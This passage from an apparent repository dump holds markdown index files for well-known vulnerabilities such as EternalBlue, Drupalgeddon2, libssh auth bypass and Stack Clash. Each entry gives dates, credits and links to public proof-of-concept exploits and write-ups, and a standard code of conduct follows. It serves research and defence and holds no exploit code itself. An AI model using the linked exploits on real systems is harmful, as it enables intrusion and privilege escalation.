[CVE-2018-0492](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0492) 17 | -------------------------------------------------------------------------------- /CVE-2018-0886.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-0886 2 | 3 | - Report: March 2018 4 | - Credit: Eyal Karni, Yaron Zinar, and Roman Blachman @ [Preempt, Research Labs](https://www.preempt.com/) 5 | 6 | ## PoC 7 | 8 | - [preempt/credssp](https://github.com/preempt/credssp) 9 | 10 | ## Reference 11 | 12 | - [From Public Key to Exploitation: How We Exploited the Authentication in MS-RDP](https://blog.preempt.com/how-we-exploited-the-authentication-in-ms-rdp) 13 | - [CVE-2018-0886](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0886) 14 | -------------------------------------------------------------------------------- /CVE-2018-10933.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-10933 2 | 3 | - Report: Oct, 2018 4 | - Credit: Peter Winter-Smith (@peterwintrsmith) 5 | 6 | ## PoC 7 | 8 | - [hackerhouse-opensource/cve-2018-10933](https://github.com/hackerhouse-opensource/cve-2018-10933) 9 | - [mlosapio/CVE-2018-10933-test](https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7) 10 | 11 | ## Reference 12 | 13 | - [libSSH 认证绕过漏洞(CVE-2018-10933)分析](https://paper.seebug.org/720/) 14 | - [libssh CVE-2018-10933 身份验证绕过漏洞分析报告](https://www.anquanke.com/post/id/162225) 15 | - [Authentication bypass in server code](https://www.libssh.org/security/advisories/CVE-2018-10933.txt) 16 | - [@svblxyz](https://twitter.com/svblxyz/status/1052241153737678849) 17 | -------------------------------------------------------------------------------- /CVE-2018-11235.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-11235 2 | 3 | - Report: May 18, 2018 4 | - Credit: [Etienne Stalmans](https://twitter.com/_staaldraad) 5 | 6 | ## PoC 7 | 8 | - [Rogdham/CVE-2018-11235](https://github.com/Rogdham/CVE-2018-11235) 9 | - [Git < 2.17.1 - Remote Code Execution](https://www.exploit-db.com/exploits/44822/) 10 | 11 | ## Reference 12 | 13 | - [CVE-2018-11235 git RCE](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/) 14 | - [CVE-2018-11235](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11235) 15 | -------------------------------------------------------------------------------- /CVE-2018-11776.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-11776, which is also known as S2-057 2 | 3 | - Report: Apr 2018 4 | - Credit: Man Yue Mo from [lgtm.com](https://t.co/zSHT5ex92f) 5 | 6 | ## PoC 7 | 8 | - [mazen160/struts-pwn_CVE-2018-11776](https://github.com/mazen160/struts-pwn_CVE-2018-11776) 9 | 10 | ## Reference 11 | 12 | - [CVE-2018-11776: How to find 5 RCEs in Apache Struts with Semmle QL](https://lgtm.com/blog/apache_struts_CVE-2018-11776) 13 | - [Semmle Discovers Critical Remote Code Execution Vulnerability in Apache Struts (CVE-2018-11776)](https://semmle.com/news/apache-struts-CVE-2018-11776) 14 | -------------------------------------------------------------------------------- /CVE-2018-4878.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-4878 2 | 3 | - Report: Feb 6 2018 4 | - Credit: KrCERT/CC 5 | 6 | ## PoC 7 | 8 | - [InQuest/malware-samples](https://github.com/InQuest/malware-samples/tree/master/CVE-2018-4878-Adobe-Flash-DRM-UAF-0day) 9 | - [FLASH 0day(CVE-2018-4878)从POC到利用](https://mp.weixin.qq.com/s/F2N04exaW8QO1IeHRZgmfg) 10 | - [Adobe Flash Exploitation, Then and Now: From CVE-2015-5119 to CVE-2018-4878](https://www.mdsec.co.uk/2018/02/adobe-flash-exploitation-then-and-now-from-cve-2015-5119-to-cve-2018-4878/) 11 | 12 | ## Reference 13 | 14 | - [CVE-2018-4878 (Flash Player up to 28.0.0.137) and Exploit Kits](https://malware.dontneedcoffee.com/2018/03/CVE-2018-4878.html) 15 | - [North Korean Hackers Allegedly Exploit Adobe Flash Player Vulnerability (CVE-2018-4878) Against South Korean Targets](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/north-korean-hackers-allegedly-exploit-adobe-flash-player-vulnerability-cve-2018-4878-against-south-korean-targets) 16 | - [보안공지 | 자료실 - KISA 인터넷 보호나라&KrCERT](https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998) 17 | - [Adobe Security Advisory](https://helpx.adobe.com/security/products/flash-player/apsa18-01.html) 18 | - [CVE-2018-4878](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878) 19 | -------------------------------------------------------------------------------- /CVE-2018-7600.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-7600 2 | 3 | - Report: Mar 28 2018 4 | - Credit: [Jasper Mattsson](https://www.drupal.org/u/Jasu_M) 5 | 6 | ## PoC 7 | 8 | - [dreadlocked/Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2) 9 | - [Remote Code Execution with Drupal core (SA-CORE-2018–002)](https://blog.appsecco.com/remote-code-execution-with-drupal-core-sa-core-2018-002-95e6ecc0c714) 10 | - [Uncovering Drupalgeddon 2](https://research.checkpoint.com/uncovering-drupalgeddon-2/) 11 | - [Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)](https://www.exploit-db.com/exploits/44482/) 12 | 13 | ## Reference 14 | 15 | - [Drupalgeddon Two. - New Drupal Vulnerability in Detail](https://lab.wallarm.com/drupalgeddon-two-81d1b424aa18) 16 | - [https://twitter.com/bendiken/status/979076199875006465](https://twitter.com/bendiken/status/979076199875006465) 17 | - [Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002](https://www.drupal.org/sa-core-2018-002) 18 | - [CVE-2018-7600](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600) 19 | -------------------------------------------------------------------------------- /CVE-2018-8174.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-8174 2 | 3 | - Report: Mar 28 2018 4 | - Credit: Ding Maoyin, Jinquan, Song Shenlei, and Yang Kang @ [Qihoo 360 Core Security](https://www.360.cn/) 5 | 6 | ## PoC 7 | 8 | - [smgorelik/Windows-RCE-exploits](https://github.com/smgorelik/Windows-RCE-exploits/tree/master/Web/VBScript) 9 | - [0x09AL/CVE-2018-8174-msf](https://github.com/0x09AL/CVE-2018-8174-msf) 10 | 11 | ## Reference 12 | 13 | - [Dissecting modern browser exploit: case study of CVE-2018–8174](https://medium.com/@florek/dissecting-modern-browser-exploit-case-study-of-cve-2018-8174-1a6046729890) 14 | - [Delving deep into VBScript - Analysis of CVE-2018-8174 exploitation](https://securelist.com/delving-deep-into-vbscript-analysis-of-cve-2018-8174-exploitation/86333/) 15 | - [Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack](http://blogs.360.cn/blog/cve-2018-8174-en/) 16 | - [CVE-2018-7600](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600) 17 | -------------------------------------------------------------------------------- /MS17-010.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-0143 ~ CVE-2017-0148 2 | 3 | - Report: April 14, 2017 4 | 5 | ## PoC 6 | 7 | - [RiskSense-Ops/MS17-010](https://github.com/RiskSense-Ops/MS17-010) 8 | - [Eternalblue exploit for Windows 8/2012](https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e) 9 | - [Eternalblue exploit for Windows 7/2008](https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a) 10 | - [eternalblue poc](https://gist.github.com/worawit/d698983c11825a9855a62a1dfbf757ca) 11 | - [worawit/MS17-010](https://github.com/worawit/MS17-010) 12 | - [levenPaths/Eternalblue-Doublepulsar-Metasploit](https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit) 13 | 14 | ## Reference 15 | 16 | - [Microsoft Security Bulletin MS17-010 - Critical](https://technet.microsoft.com/en-us/library/security/ms17-010.aspx) 17 | - [Eternal Champion Exploit Analysis](https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/) 18 | - [Wannacrypt0r-FACTSHEET](https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168) 19 | - [【权威报告】WanaCrypt0r勒索蠕虫完全分析报告](http://bobao.360.cn/learning/detail/3853.html) 20 | - [Massive WannaCry/Wcry Ransomware Attack Hits Various Countries](http://blog.trendmicro.com/trendlabs-security-intelligence/massive-wannacrywcry-ransomware-attack-hits-various-countries/) 21 | - [INTEZER - WannyCry Ransomware: Potential Link Tto North Korea](http://www.intezer.com/wp-content/uploads/2017/05/Intezer_WannaCry.pdf) 22 | - [DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis](https://zerosum0x0.blogspot.tw/2017/04/doublepulsar-initial-smb-backdoor-ring.html) 23 | - [ANALYZING THE DOUBLEPULSAR KERNEL DLL INJECTION TECHNIQUE](https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/) 24 | - [MS17-010 SMB RCE Detection](https://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010) 25 | - [A python2 script for sweeping a network to find windows systems compromised with the DOUBLEPULSAR implant.](https://github.com/countercept/doublepulsar-detection-script) 26 | - [NSA Eternalblue SMB 漏洞分析](http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/) 27 | -------------------------------------------------------------------------------- /Stack-Clash.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-1082, CVE-2017-1083, CVE-2017-1084, CVE-2017-1085, CVE-2017-3629, CVE-2017-3630, CVE-2017-3631, CVE-2017-1000364, CVE-2017-1000365, CVE-2017-1000366, CVE-2017-1000367, CVE-2017-1000369, CVE-2017-1000370, CVE-2017-1000371, CVE-2017-1000372, CVE-2017-1000373, CVE-2017-1000374, CVE-2017-1000375, CVE-2017-1000376, CVE-2017-1000377, CVE-2017-1000378, CVE-2017-1000379 2 | 3 | - Report: Jun 19, 2017 4 | - Credit: [Qualys Corporation](https://www.qualys.com/) 5 | 6 | ## PoC 7 | 8 | ### CVE-2017-1084 9 | 10 | - [FreeBSD - 'FGPE' Stack Clash (PoC)](https://www.exploit-db.com/exploits/42277/) 11 | - [FreeBSD - 'FGPU' Stack Clash (PoC)](https://www.exploit-db.com/exploits/42278/) 12 | 13 | ### CVE-2017-1085 14 | 15 | - [FreeBSD - 'setrlimit' Stack Clash (PoC)](https://www.exploit-db.com/exploits/42279/) 16 | 17 | ### CVE-2017-3629, CVE-2017-3630, CVE-2017-3631 18 | 19 | - [Oracle Solaris 11.1/11.3 (RSH) - Local Privilege Escalation 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42270/) 20 | 21 | ### CVE-2017-1000366, CVE-2017-1000370 22 | 23 | - [Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42274/) 24 | 25 | ### CVE-2017-1000366, CVE-2017-1000371 26 | 27 | - [Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42276/) 28 | 29 | ### CVE-2017-1000366, CVE-2017-1000379 30 | 31 | - [Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42275/) 32 | 33 | ### CVE-2017-1000367 34 | 35 | - [Sudo - 'get_process_ttyname()' Privilege Escalation](https://www.exploit-db.com/exploits/42183/) 36 | - [c0d3z3r0/sudo-CVE-2017-1000367](https://github.com/c0d3z3r0/sudo-CVE-2017-1000367) 37 | 38 | ### CVE-2017-1000370, CVE-2017-1000371 39 | 40 | - [Linux Kernel - 'offset2lib' 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42273/) 41 | 42 | ### CVE-2017-1000373 43 | 44 | - [OpenBSD - 'at' Local Privilege Escalation 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42271/) 45 | 46 | ### CVE-2017-1000375 47 | 48 | - [NetBSD - 'Stack Clash' (PoC)](https://www.exploit-db.com/exploits/42272/) 49 | 50 | ## Reference 51 | 52 | - [stack-clash.txt](https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt) 53 | - [A Decade Old Unix/Linux/BSD Root Privilege-Escalation Bug Discovered](http://thehackernews.com/2017/06/linux-root-privilege-escalation.html) 54 | - [CVE-2017-1000367 in Sudo's get_process_ttyname() for Linux](https://www.qualys.com/2017/05/30/cve-2017-1000367/cve-2017-1000367.txt) 55 | - [Linux security alert: Bug in sudo’s get_process_ttyname() [ CVE-2017-1000367 ]](https://www.cyberciti.biz/security/linux-security-alert-bug-in-sudos-get_process_ttyname-cve-2017-1000367/) 56 | -------------------------------------------------------------------------------- /code-of-conduct.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, gender identity and expression, level of experience, 9 | nationality, personal appearance, race, religion, or sexual identity and 10 | orientation. 11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at boik@tdohacker.org. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at [http://contributor-covenant.org/version/1/4][version] 72 | 73 | [homepage]: http://contributor-covenant.org 74 | [version]: http://contributor-covenant.org/version/1/4/ 75 | --------------------------------------------------------------------------------